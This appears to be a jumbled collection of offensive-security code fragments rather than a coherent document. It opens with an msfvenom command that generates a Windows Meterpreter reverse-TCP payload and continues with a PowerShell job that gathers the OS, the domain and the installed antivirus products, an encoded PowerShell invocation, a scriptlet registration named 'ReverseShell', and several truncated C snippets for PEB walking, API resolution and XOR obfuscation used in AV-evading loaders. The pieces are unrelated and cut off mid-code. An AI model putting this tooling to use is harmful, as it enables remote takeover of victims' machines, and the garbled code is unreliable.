msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.75.128 LPORT=9001 -f raw > protection.bin
$udGXjGVXGXbtYwiRfqjVk = Start-Job -ScriptBlock {
$SyXSoDNGGAhAAe = (Get-WmiObject -Class Win32_OperatingSystem).Caption
$Cg = '25'
$BmeBoy = '39b24536-f33f-48ee-9d63-4723e42e16f9'
$hr = [System.Net.WebUtility]::UrlEncode($SyXSoDNGGAhAAe)
$hhowUyysZxUVhmaQelBiPDRiUn = Get-WmiObject Win32_ComputerSystem | Select-Object -ExpandProperty Domain
$LhvJgxbikeJRfx = Get-WmiObject -Namespace "root\SecurityCenter2" -Class AntiVirusProduct
$JDJDUfKZAfHGJBoPloDnifXiw = $LhvJgxbikeJRfx | ForEach-Object {
$_.displayName
}
powershell -e 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
<?XML version="1.0"?>
<scriptlet>
<registration
description="ReverseShell"
progid="ReverseShell"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
>
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "helpers.h"
#pragma comment(linker, "/entry:WinMain")
typedef DWORD (WINAPI * WaitForSingleObject_t)(
#include "PEstructs.h"
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "helpers.h"
HMODULE WINAPI hlpGetModuleHandle(LPCWSTR sModuleName) {
// get the offset of Process Environment Block
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void XOR(char * data, size_t data_len, char * key, size_t key_len) {
int j;
j = 0;
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main(void) {
HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
HMODULE hNtdll = GetModuleHandle("ntdll.dll");
DWORD oldprotect;
// Function pointers typedefs
#include <windows.h>
#include <iostream>
#define KEY 'A' // our key
// Function to encrypt/decrypt strings
void XOR(LPSTR data, int data_len) {
for (int i = 0; i < data_len; i++) {
data[i] ^= KEY;
}
#include <windows.h>
#include <iostream>
int main() {
// Load the user32.dll library
HMODULE user32Dll = GetModuleHandle(L"user32.dll");
// Define a function pointer for MessageBoxW
typedef int (WINAPI* MessageBoxWFunc)(
HWND hwnd,